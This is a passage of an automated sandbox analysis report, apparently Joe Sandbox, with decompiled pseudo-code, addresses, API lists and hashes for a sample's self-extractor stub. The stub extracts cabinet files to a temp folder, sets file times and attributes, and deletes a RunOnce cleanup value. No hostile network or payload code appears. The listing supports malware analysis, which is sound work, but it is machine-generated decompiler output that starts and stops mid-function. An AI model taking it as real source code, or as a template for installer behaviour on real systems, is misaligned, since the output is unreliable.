                                                                      					if(( *0xf89a34 & 0x00000020) != 0) {
                                                                      						E00F865E8( &_v268);
                                                                      					}
                                                                      					SetCurrentDirectoryA(".."); // executed
                                                                      					_t22 =  &_v268;
                                                                      					E00F82390( &_v268);
                                                                      					_t11 =  *0xf88a20; // 0x0
                                                                      				}
                                                                      				if( *0xf89a40 != 1 && _t11 != 0) {
                                                                      					_t11 = E00F81FE1(_t22); // executed
                                                                      				}
                                                                      				 *0xf88a20 =  *0xf88a20 & 0x00000000;
                                                                      				return E00F86CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                      			}












                                                                      0x00f852b6
                                                                      0x00f852b6
                                                                      0x00f852b6
                                                                      0x00f852c1
                                                                      0x00f852c8
                                                                      0x00f852cb
                                                                      0x00f852cc
                                                                      0x00f852d4
                                                                      0x00f852d6
                                                                      0x00f852d7
                                                                      0x00f852de
                                                                      0x00f852e0
                                                                      0x00f852f2
                                                                      0x00f852fa
                                                                      0x00f852fa
                                                                      0x00f85302
                                                                      0x00f85305
                                                                      0x00f8530c
                                                                      0x00f85312
                                                                      0x00f85316
                                                                      0x00f85316
                                                                      0x00f85317
                                                                      0x00f8531c
                                                                      0x00f8531f
                                                                      0x00f85333
                                                                      0x00f85345
                                                                      0x00f85351
                                                                      0x00f85359
                                                                      0x00f85359
                                                                      0x00f85363
                                                                      0x00f85369
                                                                      0x00f8536f
                                                                      0x00f85374
                                                                      0x00f85374
                                                                      0x00f85381
                                                                      0x00f85387
                                                                      0x00f85387
                                                                      0x00f8538f
                                                                      0x00f853a0

                                                                      APIs
                                                                      • SetFileAttributesA.KERNELBASE(00798408,00000080,?,00000000), ref: 00F852F2
                                                                      • DeleteFileA.KERNELBASE(00798408), ref: 00F852FA
                                                                      • LocalFree.KERNEL32(00798408,?,00000000), ref: 00F85305
                                                                      • LocalFree.KERNEL32(00798408), ref: 00F8530C
                                                                      • SetCurrentDirectoryA.KERNELBASE(00F811FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00F85363
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00F85334
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                      • API String ID: 2833751637-1116576409
                                                                      • Opcode ID: ed04843a71145ed09d10b8c624170e7a0aa507e00999466ea6cdb6ac464d375d
                                                                      • Instruction ID: 5cf1658226ae399e93f2bd067b06c2e7b0e05c178f42a7f61b76b7869c505087
                                                                      • Opcode Fuzzy Hash: ed04843a71145ed09d10b8c624170e7a0aa507e00999466ea6cdb6ac464d375d
                                                                      • Instruction Fuzzy Hash: DC21A13191460CDBDB24BB20DD49BF977A5FB00BA0F48015AE442561A0CFF99C85FB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00F81FE1(void* __ecx) {
                                                                      				void* _v8;
                                                                      				long _t4;
                                                                      
                                                                      				if( *0xf88530 != 0) {
                                                                      					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                      					if(_t4 == 0) {
                                                                      						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
                                                                      						return RegCloseKey(_v8);
                                                                      					}
                                                                      				}
                                                                      				return _t4;
                                                                      			}





                                                                      0x00f81fee
                                                                      0x00f82005
                                                                      0x00f8200d
                                                                      0x00f82017
                                                                      0x00000000
                                                                      0x00f82020
                                                                      0x00f8200d
                                                                      0x00f82029

                                                                      APIs
                                                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00F8538C,?,?,00F8538C), ref: 00F82005
                                                                      • RegDeleteValueA.KERNELBASE(00F8538C,wextract_cleanup1,?,?,00F8538C), ref: 00F82017
                                                                      • RegCloseKey.ADVAPI32(00F8538C,?,?,00F8538C), ref: 00F82020
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: CloseDeleteOpenValue
                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
                                                                      • API String ID: 849931509-1592051331
                                                                      • Opcode ID: 0984bc286fffa5744f7921f407c6bfc5cd6719f4b6e973a4e2dada2489fb5746
                                                                      • Instruction ID: f247c37aea4066049c6a219f724ffa978d5a80acc01609ef5bb0f439f9151939
                                                                      • Opcode Fuzzy Hash: 0984bc286fffa5744f7921f407c6bfc5cd6719f4b6e973a4e2dada2489fb5746
                                                                      • Instruction Fuzzy Hash: 83E04F3095031CBBEB22ABD0EC0AFE97B69E701791F640195B904A4060EB61AA14F706
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E00F84CD0(char* __edx, long _a4, int _a8) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t29;
                                                                      				int _t30;
                                                                      				long _t32;
                                                                      				signed int _t33;
                                                                      				long _t35;
                                                                      				long _t36;
                                                                      				struct HWND__* _t37;
                                                                      				long _t38;
                                                                      				long _t39;
                                                                      				long _t41;
                                                                      				long _t44;
                                                                      				long _t45;
                                                                      				long _t46;
                                                                      				signed int _t50;
                                                                      				long _t51;
                                                                      				char* _t58;
                                                                      				long _t59;
                                                                      				char* _t63;
                                                                      				long _t64;
                                                                      				CHAR* _t71;
                                                                      				CHAR* _t74;
                                                                      				int _t75;
                                                                      				signed int _t76;
                                                                      
                                                                      				_t69 = __edx;
                                                                      				_t29 =  *0xf88004; // 0x644c7055
                                                                      				_t30 = _t29 ^ _t76;
                                                                      				_v8 = _t30;
                                                                      				_t75 = _a8;
                                                                      				if( *0xf891d8 == 0) {
                                                                      					_t32 = _a4;
                                                                      					__eflags = _t32;
                                                                      					if(_t32 == 0) {
                                                                      						_t33 = E00F84E99(_t75);
                                                                      						L35:
                                                                      						return E00F86CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                      					}
                                                                      					_t35 = _t32 - 1;
                                                                      					__eflags = _t35;
                                                                      					if(_t35 == 0) {
                                                                      						L9:
                                                                      						_t33 = 0;
                                                                      						goto L35;
                                                                      					}
                                                                      					_t36 = _t35 - 1;
                                                                      					__eflags = _t36;
                                                                      					if(_t36 == 0) {
                                                                      						_t37 =  *0xf88584; // 0x0
                                                                      						__eflags = _t37;
                                                                      						if(_t37 != 0) {
                                                                      							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                      						}
                                                                      						_t54 = 0xf891e4;
                                                                      						_t58 = 0xf891e4;
                                                                      						do {
                                                                      							_t38 =  *_t58;
                                                                      							_t58 =  &(_t58[1]);
                                                                      							__eflags = _t38;
                                                                      						} while (_t38 != 0);
                                                                      						_t59 = _t58 - 0xf891e5;
                                                                      						__eflags = _t59;
                                                                      						_t71 =  *(_t75 + 4);
                                                                      						_t73 =  &(_t71[1]);
                                                                      						do {
                                                                      							_t39 =  *_t71;
                                                                      							_t71 =  &(_t71[1]);
                                                                      							__eflags = _t39;
                                                                      						} while (_t39 != 0);
                                                                      						_t69 = _t71 - _t73;
                                                                      						_t30 = _t59 + 1 + _t71 - _t73;
                                                                      						__eflags = _t30 - 0x104;
                                                                      						if(_t30 >= 0x104) {
                                                                      							L3:
                                                                      							_t33 = _t30 | 0xffffffff;
                                                                      							goto L35;
                                                                      						}
                                                                      						_t69 = 0xf891e4;
                                                                      						_t30 = E00F84702( &_v268, 0xf891e4,  *(_t75 + 4));
                                                                      						__eflags = _t30;
                                                                      						if(__eflags == 0) {
                                                                      							goto L3;
                                                                      						}
                                                                      						_t41 = E00F8476D( &_v268, __eflags);
                                                                      						__eflags = _t41;
                                                                      						if(_t41 == 0) {
                                                                      							goto L9;
                                                                      						}
                                                                      						_push(0x180);
                                                                      						_t30 = E00F84980( &_v268, 0x8302); // executed
                                                                      						_t75 = _t30;
                                                                      						__eflags = _t75 - 0xffffffff;
                                                                      						if(_t75 == 0xffffffff) {
                                                                      							goto L3;
                                                                      						}
                                                                      						_t30 = E00F847E0( &_v268);
                                                                      						__eflags = _t30;
                                                                      						if(_t30 == 0) {
                                                                      							goto L3;
                                                                      						}
                                                                      						 *0xf893f4 =  *0xf893f4 + 1;
                                                                      						_t33 = _t75;
                                                                      						goto L35;
                                                                      					}
                                                                      					_t44 = _t36 - 1;
                                                                      					__eflags = _t44;
                                                                      					if(_t44 == 0) {
                                                                      						_t54 = 0xf891e4;
                                                                      						_t63 = 0xf891e4;
                                                                      						do {
                                                                      							_t45 =  *_t63;
                                                                      							_t63 =  &(_t63[1]);
                                                                      							__eflags = _t45;
                                                                      						} while (_t45 != 0);
                                                                      						_t74 =  *(_t75 + 4);
                                                                      						_t64 = _t63 - 0xf891e5;
                                                                      						__eflags = _t64;
                                                                      						_t69 =  &(_t74[1]);
                                                                      						do {
                                                                      							_t46 =  *_t74;
                                                                      							_t74 =  &(_t74[1]);
                                                                      							__eflags = _t46;
                                                                      						} while (_t46 != 0);
                                                                      						_t73 = _t74 - _t69;
                                                                      						_t30 = _t64 + 1 + _t74 - _t69;
                                                                      						__eflags = _t30 - 0x104;
                                                                      						if(_t30 >= 0x104) {
                                                                      							goto L3;
                                                                      						}
                                                                      						_t69 = 0xf891e4;
                                                                      						_t30 = E00F84702( &_v268, 0xf891e4,  *(_t75 + 4));
                                                                      						__eflags = _t30;
                                                                      						if(_t30 == 0) {
                                                                      							goto L3;
                                                                      						}
                                                                      						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                      						_t30 = E00F84C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                      						__eflags = _t30;
                                                                      						if(_t30 == 0) {
                                                                      							goto L3;
                                                                      						}
                                                                      						E00F84B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                      						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                      						__eflags = _t50;
                                                                      						if(_t50 != 0) {
                                                                      							_t51 = _t50 & 0x00000027;
                                                                      							__eflags = _t51;
                                                                      						} else {
                                                                      							_t51 = 0x80;
                                                                      						}
                                                                      						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                      						__eflags = _t30;
                                                                      						if(_t30 == 0) {
                                                                      							goto L3;
                                                                      						} else {
                                                                      							_t33 = 1;
                                                                      							goto L35;
                                                                      						}
                                                                      					}
                                                                      					_t30 = _t44 - 1;
                                                                      					__eflags = _t30;
                                                                      					if(_t30 == 0) {
                                                                      						goto L3;
                                                                      					}
                                                                      					goto L9;
                                                                      				}
                                                                      				if(_a4 == 3) {
                                                                      					_t30 = E00F84B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                      				}
                                                                      				goto L3;
                                                                      			}































                                                                      0x00f84cd0
                                                                      0x00f84cdb
                                                                      0x00f84ce0
                                                                      0x00f84ce2
                                                                      0x00f84cee
                                                                      0x00f84cf2
                                                                      0x00f84d0e
                                                                      0x00f84d0e
                                                                      0x00f84d11
                                                                      0x00f84e83
                                                                      0x00f84e88
                                                                      0x00f84e98
                                                                      0x00f84e98
                                                                      0x00f84d17
                                                                      0x00f84d17
                                                                      0x00f84d1a
                                                                      0x00f84d2f
                                                                      0x00f84d2f
                                                                      0x00000000
                                                                      0x00f84d2f
                                                                      0x00f84d1c
                                                                      0x00f84d1c
                                                                      0x00f84d1f
                                                                      0x00f84dcb
                                                                      0x00f84dd0
                                                                      0x00f84dd2
                                                                      0x00f84ddd
                                                                      0x00f84ddd
                                                                      0x00f84de3
                                                                      0x00f84de8
                                                                      0x00f84ded
                                                                      0x00f84ded
                                                                      0x00f84def
                                                                      0x00f84df0
                                                                      0x00f84df0
                                                                      0x00f84df4
                                                                      0x00f84df4
                                                                      0x00f84df6
                                                                      0x00f84df9
                                                                      0x00f84dfc
                                                                      0x00f84dfc
                                                                      0x00f84dfe
                                                                      0x00f84dff
                                                                      0x00f84dff
                                                                      0x00f84e03
                                                                      0x00f84e08
                                                                      0x00f84e0a
                                                                      0x00f84e0f
                                                                      0x00f84d03
                                                                      0x00f84d03
                                                                      0x00000000
                                                                      0x00f84d03
                                                                      0x00f84e18
                                                                      0x00f84e20
                                                                      0x00f84e25
                                                                      0x00f84e27
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f84e33
                                                                      0x00f84e38
                                                                      0x00f84e3a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f84e40
                                                                      0x00f84e51
                                                                      0x00f84e56
                                                                      0x00f84e5b
                                                                      0x00f84e5e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f84e6a
                                                                      0x00f84e6f
                                                                      0x00f84e71
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f84e77
                                                                      0x00f84e7d
                                                                      0x00000000
                                                                      0x00f84e7d
                                                                      0x00f84d25
                                                                      0x00f84d25
                                                                      0x00f84d28
                                                                      0x00f84d36
                                                                      0x00f84d3b
                                                                      0x00f84d40
                                                                      0x00f84d40
                                                                      0x00f84d42
                                                                      0x00f84d43
                                                                      0x00f84d43
                                                                      0x00f84d47
                                                                      0x00f84d4a
                                                                      0x00f84d4a
                                                                      0x00f84d4c
                                                                      0x00f84d4f
                                                                      0x00f84d4f
                                                                      0x00f84d51
                                                                      0x00f84d52
                                                                      0x00f84d52
                                                                      0x00f84d56
                                                                      0x00f84d5b
                                                                      0x00f84d5d
                                                                      0x00f84d62
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f84d67
                                                                      0x00f84d6f
                                                                      0x00f84d74
                                                                      0x00f84d76
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f84d7c
                                                                      0x00f84d84
                                                                      0x00f84d89
                                                                      0x00f84d8b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f84d94
                                                                      0x00f84d99
                                                                      0x00f84d9e
                                                                      0x00f84da1
                                                                      0x00f84daa
                                                                      0x00f84daa
                                                                      0x00f84da3
                                                                      0x00f84da3
                                                                      0x00f84da3
                                                                      0x00f84db5
                                                                      0x00f84dbb
                                                                      0x00f84dbd
                                                                      0x00000000
                                                                      0x00f84dc3
                                                                      0x00f84dc5
                                                                      0x00000000
                                                                      0x00f84dc5
                                                                      0x00f84dbd
                                                                      0x00f84d2a
                                                                      0x00f84d2a
                                                                      0x00f84d2d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f84d2d
                                                                      0x00f84cf8
                                                                      0x00f84cfd
                                                                      0x00f84d02
                                                                      0x00000000

                                                                      APIs
                                                                      • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00F84DB5
                                                                      • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00F84DDD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFileItemText
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                      • API String ID: 3625706803-1116576409
                                                                      • Opcode ID: 814f8040a26017a064595373696bfcd2468628d73580d56071caa2167e531673
                                                                      • Instruction ID: 766fdcfe5aba5d4932fec2f4807479affe6b93ece791b8edbcd2169f37f7fd84
                                                                      • Opcode Fuzzy Hash: 814f8040a26017a064595373696bfcd2468628d73580d56071caa2167e531673
                                                                      • Instruction Fuzzy Hash: 1241F337A041079BCF25BF28DD486F973A5EB45320F084669E88297285DA35FE4AF750
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00F84C37(signed int __ecx, int __edx, int _a4) {
                                                                      				struct _FILETIME _v12;
                                                                      				struct _FILETIME _v20;
                                                                      				FILETIME* _t14;
                                                                      				int _t15;
                                                                      				signed int _t21;
                                                                      
                                                                      				_t21 = __ecx * 0x18;
                                                                      				if( *((intOrPtr*)(_t21 + 0xf88d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                      					L5:
                                                                      					return 0;
                                                                      				} else {
                                                                      					_t14 =  &_v12;
                                                                      					_t15 = SetFileTime( *(_t21 + 0xf88d74), _t14, _t14, _t14); // executed
                                                                      					if(_t15 == 0) {
                                                                      						goto L5;
                                                                      					}
                                                                      					return 1;
                                                                      				}
                                                                      			}








                                                                      0x00f84c40
                                                                      0x00f84c4a
                                                                      0x00f84c8d
                                                                      0x00000000
                                                                      0x00f84c70
                                                                      0x00f84c70
                                                                      0x00f84c7e
                                                                      0x00f84c86
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f84c8a

                                                                      APIs
                                                                      • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00F84C54
                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F84C66
                                                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 00F84C7E
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Time$File$DateLocal
                                                                      • String ID:
                                                                      • API String ID: 2071732420-0
                                                                      • Opcode ID: e4f816d0b92fbdfeb0de217be8ba7fcf52820916e8ed8cda9847e2ac71853c78
                                                                      • Instruction ID: 35dd3069a43dfde606291448e465da8e6c913a1a7a62e06b04a6584ebb1aabce
                                                                      • Opcode Fuzzy Hash: e4f816d0b92fbdfeb0de217be8ba7fcf52820916e8ed8cda9847e2ac71853c78
                                                                      • Instruction Fuzzy Hash: 0FF03072A0120EAFAB25EFB5CC49DFB77ADEB05250B44452BB915C1051EA30E914FBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E00F8487A(CHAR* __ecx, signed int __edx) {
                                                                      				void* _t7;
                                                                      				CHAR* _t11;
                                                                      				long _t18;
                                                                      				long _t23;
                                                                      
                                                                      				_t11 = __ecx;
                                                                      				asm("sbb edi, edi");
                                                                      				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                      				if((__edx & 0x00000100) == 0) {
                                                                      					asm("sbb esi, esi");
                                                                      					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                      				} else {
                                                                      					if((__edx & 0x00000400) == 0) {
                                                                      						asm("sbb esi, esi");
                                                                      						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                      					} else {
                                                                      						_t23 = 1;
                                                                      					}
                                                                      				}
                                                                      				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                      				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                      					return _t7;
                                                                      				} else {
                                                                      					E00F8490C(_t11);
                                                                      					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                      				}
                                                                      			}







                                                                      0x00f84880
                                                                      0x00f8488c
                                                                      0x00f84894
                                                                      0x00f848a0
                                                                      0x00f848c9
                                                                      0x00f848ce
                                                                      0x00f848a2
                                                                      0x00f848a8
                                                                      0x00f848b7
                                                                      0x00f848bc
                                                                      0x00f848aa
                                                                      0x00f848ac
                                                                      0x00f848ac
                                                                      0x00f848a8
                                                                      0x00f848de
                                                                      0x00f848e7
                                                                      0x00f8490b
                                                                      0x00f848ee
                                                                      0x00f848f0
                                                                      0x00000000
                                                                      0x00f84902

                                                                      APIs
                                                                      • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00F84A23,?,00F84F67,*MEMCAB,00008000,00000180), ref: 00F848DE
                                                                      • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00F84F67,*MEMCAB,00008000,00000180), ref: 00F84902
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: e395279ecb79f1d68940f25edc77cb73ac7cd409f17a0b2355c01bcbe6eef66d
                                                                      • Instruction ID: 75ed903f5eb3362a487a4d0e5458f13746432ed4c5b363cfd67eb3b2fbf019e4
                                                                      • Opcode Fuzzy Hash: e395279ecb79f1d68940f25edc77cb73ac7cd409f17a0b2355c01bcbe6eef66d
                                                                      • Instruction Fuzzy Hash: 6C014BA3E1257526F724A0294C88FF7555CCB96734F1B0335FDAAE71D1D664AC04A3E0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E00F84AD0(signed int _a4, void* _a8, long _a12) {
                                                                      				signed int _t9;
                                                                      				int _t12;
                                                                      				signed int _t14;
                                                                      				signed int _t15;
                                                                      				void* _t20;
                                                                      				struct HWND__* _t21;
                                                                      				signed int _t24;
                                                                      				signed int _t25;
                                                                      
                                                                      				_t20 =  *0xf8858c; // 0x268
                                                                      				_t9 = E00F83680(_t20);
                                                                      				if( *0xf891d8 == 0) {
                                                                      					_push(_t24);
                                                                      					_t12 = WriteFile( *(0xf88d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                      					if(_t12 != 0) {
                                                                      						_t25 = _a12;
                                                                      						if(_t25 != 0xffffffff) {
                                                                      							_t14 =  *0xf89400; // 0x5dc00
                                                                      							_t15 = _t14 + _t25;
                                                                      							 *0xf89400 = _t15;
                                                                      							if( *0xf88184 != 0) {
                                                                      								_t21 =  *0xf88584; // 0x0
                                                                      								if(_t21 != 0) {
                                                                      									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xf893f8, 0);
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						_t25 = _t24 | 0xffffffff;
                                                                      					}
                                                                      					return _t25;
                                                                      				} else {
                                                                      					return _t9 | 0xffffffff;
                                                                      				}
                                                                      			}











                                                                      0x00f84ad5
                                                                      0x00f84adb
                                                                      0x00f84ae7
                                                                      0x00f84aee
                                                                      0x00f84b05
                                                                      0x00f84b0d
                                                                      0x00f84b14
                                                                      0x00f84b1a
                                                                      0x00f84b1c
                                                                      0x00f84b21
                                                                      0x00f84b2a
                                                                      0x00f84b2f
                                                                      0x00f84b31
                                                                      0x00f84b39
                                                                      0x00f84b54
                                                                      0x00f84b54
                                                                      0x00f84b39
                                                                      0x00f84b2f
                                                                      0x00f84b0f
                                                                      0x00f84b0f
                                                                      0x00f84b0f
                                                                      0x00f84b5e
                                                                      0x00f84ae9
                                                                      0x00f84aed
                                                                      0x00f84aed

                                                                      APIs
                                                                        • Part of subcall function 00F83680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00F8369F
                                                                        • Part of subcall function 00F83680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00F836B2
                                                                        • Part of subcall function 00F83680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00F836DA
                                                                      • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00F84B05
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                      • String ID:
                                                                      • API String ID: 1084409-0
                                                                      • Opcode ID: 7753826566daa48207e258a031364ebc963c61091691f191a32ea56db4471ee4
                                                                      • Instruction ID: 0189e0df423eecc880a8cf2ceb0677014a3b07264e24c7e85c593ac3b8b22216
                                                                      • Opcode Fuzzy Hash: 7753826566daa48207e258a031364ebc963c61091691f191a32ea56db4471ee4
                                                                      • Instruction Fuzzy Hash: 1D018C3164020AABDB14AF68DC05BF27759FB84735F098225F9399B1E1CB70E812EB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00F8658A(char* __ecx, void* __edx, char* _a4) {
                                                                      				intOrPtr _t4;
                                                                      				char* _t6;
                                                                      				char* _t8;
                                                                      				void* _t10;
                                                                      				void* _t12;
                                                                      				char* _t16;
                                                                      				intOrPtr* _t17;
                                                                      				void* _t18;
                                                                      				char* _t19;
                                                                      
                                                                      				_t16 = __ecx;
                                                                      				_t10 = __edx;
                                                                      				_t17 = __ecx;
                                                                      				_t1 = _t17 + 1; // 0xf88b3f
                                                                      				_t12 = _t1;
                                                                      				do {
                                                                      					_t4 =  *_t17;
                                                                      					_t17 = _t17 + 1;
                                                                      				} while (_t4 != 0);
                                                                      				_t18 = _t17 - _t12;
                                                                      				_t2 = _t18 + 1; // 0xf88b40
                                                                      				if(_t2 < __edx) {
                                                                      					_t19 = _t18 + __ecx;
                                                                      					if(_t19 > __ecx) {
                                                                      						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                      						if( *_t8 != 0x5c) {
                                                                      							 *_t19 = 0x5c;
                                                                      							_t19 =  &(_t19[1]);
                                                                      						}
                                                                      					}
                                                                      					_t6 = _a4;
                                                                      					 *_t19 = 0;
                                                                      					while( *_t6 == 0x20) {
                                                                      						_t6 = _t6 + 1;
                                                                      					}
                                                                      					return E00F816B3(_t16, _t10, _t6);
                                                                      				}
                                                                      				return 0x8007007a;
                                                                      			}












                                                                      0x00f86592
                                                                      0x00f86594
                                                                      0x00f86596
                                                                      0x00f86598
                                                                      0x00f86598
                                                                      0x00f8659b
                                                                      0x00f8659b
                                                                      0x00f8659d
                                                                      0x00f8659e
                                                                      0x00f865a2
                                                                      0x00f865a4
                                                                      0x00f865a9
                                                                      0x00f865b2
                                                                      0x00f865b6
